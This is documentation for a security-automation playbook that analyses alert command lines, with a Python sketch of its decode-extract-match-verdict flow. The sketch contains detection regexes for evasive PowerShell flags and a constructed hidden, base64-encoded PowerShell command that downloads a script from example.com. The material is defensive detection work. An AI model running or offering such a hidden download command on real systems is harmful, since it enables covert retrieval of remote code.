# Command-Line Analysis

This playbook is part of the Common Playbooks Pack.

#### Supported versions

Supported Cortex XSOAR versions: 6.0.0 and later.
This playbook takes a command line from the alert and performs the following actions:
- Checks for base64 string and decodes if exists
- Extracts and enriches indicators from the command line
- Checks specific arguments for malicious usage
At the end of the playbook, it sets a possible verdict for the command line based on the findings:
- Indicators found in the command line
- Found AMSI techniques
- Found suspicious parameters
- Usage of malicious tools
- Indication of network activity
- Indication of suspicious LOLBIN execution
Note: If you want to run this playbook against a list of command lines, configure it to run in a loop. To do so, open the playbook task's 'Loop' tab and check "For Each Input".
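The flow described above (decode a base64 argument, extract indicators, match suspicious arguments, set a verdict) as an added Python sketch; this is example code, not the playbook's own scripts. The base64 token regex, the URL/IP patterns, the suspicious-argument regexes, the verdict rule and the sample command line are all assumed or constructed here and are not taken from the playbook.

```python
import base64
import re

# Constructed sample alert command line (not from the page): a PowerShell launch whose
# -EncodedCommand is UTF-16LE base64, built here so the example is self-contained.
PLAIN_INNER = "Invoke-WebRequest http://example.com/update.ps1 -OutFile C:\\Temp\\u.ps1"
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
                  + base64.b64encode(PLAIN_INNER.encode("utf-16le")).decode("ascii"))

# Assumed patterns for illustration; the playbook's own MatchRegexV2 inputs are not on the page.
BASE64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SUSPICIOUS_ARGS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded command": re.compile(r"-e(?:ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def try_decode_base64(token):
    """Decode a base64 token, trying UTF-16LE (PowerShell -EncodedCommand) then UTF-8."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for enc in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # Heuristic: accept only printable, mostly-ASCII output, so a long ordinary word
        # that merely looks like base64 is left untouched.
        if text and all(c.isprintable() or c in "\r\n\t" for c in text) \
                and sum(c.isascii() for c in text) >= 0.9 * len(text):
            return text
    return None

def analyze_commandline(cmdline):
    """Mirror the playbook: decode base64, extract indicators, match arguments, set a verdict."""
    decoded = BASE64_TOKEN.sub(lambda m: try_decode_base64(m.group(0)) or m.group(0), cmdline)
    indicators = {"URL": sorted(set(URL_RE.findall(decoded))),
                  "IP": sorted(set(IPV4_RE.findall(decoded)))}
    matched = [name for name, rx in SUSPICIOUS_ARGS.items()
               if rx.search(cmdline) or rx.search(decoded)]
    # Output keys follow the playbook's output paths; the verdict rule itself is an assumption.
    verdict = "Suspicious" if (matched or any(indicators.values())) else "Unknown"
    return {"commandline": {"original": cmdline, "decoded": decoded},
            "Indicators": indicators, "MatchRegex": matched, "CommandlineVerdict": verdict}
```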
## Dependencies

This playbook uses the following sub-playbooks, integrations, and scripts.

### Sub-playbooks

- Compare Process Execution Arguments To LOLBAS Patterns

### Integrations

This playbook does not use any integrations.

### Scripts

- DeleteContext
- Set
- Base64Decode
- MatchRegexV2

### Commands

- extractIndicators
## Playbook Inputs

| Name | Description | Default Value | Required |
|---|---|---|---|
| Commandline | The command line. | | Optional |
| StringSimilarityThreshold | Threshold for the StringSimilarity automation, used by the "Compare Process Execution Arguments To LOLBAS Patterns" sub-playbook. | 0.5 | Optional |
#
## Playbook Outputs

| Path | Description | Type |
|---|---|---|
| MatchRegex | The regex matches found in the command line. | unknown |
| Indicators | Indicators extracted from the command line. | unknown |
| commandline.original | The original command line. | unknown |
| commandline.decoded | The decoded command line. | unknown |
| CommandlineVerdict | The command line verdict. | unknown |
| IP | The IP object. | unknown |
| URL | The URL object. | unknown |
| File | The file object. | unknown |
| Domain | The domain object. | unknown |